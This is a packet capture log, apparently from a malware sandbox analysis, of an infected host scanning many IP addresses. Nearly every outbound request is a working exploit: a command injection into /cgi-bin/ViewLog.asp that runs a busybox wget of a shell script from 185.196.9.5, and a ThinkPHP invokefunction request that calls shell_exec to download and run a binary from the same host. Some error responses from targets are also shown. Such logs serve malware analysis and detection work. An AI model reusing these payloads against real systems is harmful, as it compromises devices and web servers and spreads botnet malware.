Session ID	Source IP	Source Port	Destination IP	Destination Port
445	192.168.2.15	55170	31.47.0.37	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.749439001 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
446	192.168.2.15	47902	94.121.142.42	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.768234968 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
447	192.168.2.15	60944	95.86.102.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.774013042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
448	192.168.2.15	37584	94.120.60.116	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.777626038 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
449	192.168.2.15	58278	94.122.121.73	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.778387070 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
450	192.168.2.15	41960	31.136.202.187	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.911453962 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.469930887 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:39.589833975 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.801850080 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:46.406053066 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:55.365726948 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:13.797683001 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:50.661406994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
451	192.168.2.15	39636	94.46.175.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.938849926 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.130459070 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:37 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
452	192.168.2.15	47746	94.123.142.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.988029957 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
453	192.168.2.15	36982	94.110.17.24	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.100615025 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
454	192.168.2.15	40584	88.208.240.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.559356928 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:38.734734058 CET	1286	IN	HTTP/1.1 400 Bad Request Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 2071 Date: Sun, 25 Feb 2024 18:03:38 GMT Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 45 78 63 65 70 74 69 6f 6e 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 5b 68 69 6e 6b 30 78 30 37 70 70 26 23 34 37 3b 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 33 39 3b 77 67 65 74 20 5d 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 70 3e 3c 62 3e 45 78 63 65 70 74 69 6f 6e 3c 2f 62 3e 3c 2f 70 3e 3c 70 72 65 3e 6a 61 76 61 2e 6c 61 6e 67 2e 49 6c 6c 65 67 61 6c 41 72 67 75 6d 65 6e 74 45 78 63 65 70 74 69 6f 6e 3a 20 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 5b 68 69 6e 6b 30 78 30 37 70 70 26 23 34 37 3b 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 33 39 3b 77 67 65 74 20 5d 0a 09 Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [hink0x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget ]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><p><b>Exception</b></p><pre>java.lang.IllegalArgumentException: Invalid character found in the HTTP protocol [hink0x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget ]
Feb 25, 2024 19:03:38.734771013 CET	976	IN	Data Raw: 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 79 6f 74 65 2e 68 74 74 70 31 31 2e 48 74 74 70 31 31 49 6e 70 75 74 42 75 66 66 65 72 2e 70 61 72 73 65 52 65 71 75 65 73 74 4c 69 6e 65 28 48 74 74 70 31 31 49 6e 70 75 74 42 75 66 66 65 72 2e 6a 61 76 61 Data Ascii: org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:585)org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:513)org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:6

Session ID	Source IP	Source Port	Destination IP	Destination Port
455	192.168.2.15	39958	88.221.4.94	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.590276003 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:38.796199083 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:38 GMT Date: Sun, 25 Feb 2024 18:03:38 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 66 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 32 31 38 26 23 34 36 3b 66 38 37 30 33 63 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.efe6655f.1708884218.f8703c2</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
456	192.168.2.15	40704	95.85.29.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.754399061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
457	192.168.2.15	53484	95.111.253.52	80

Timestamp	Bytes transferred	Direction	Data
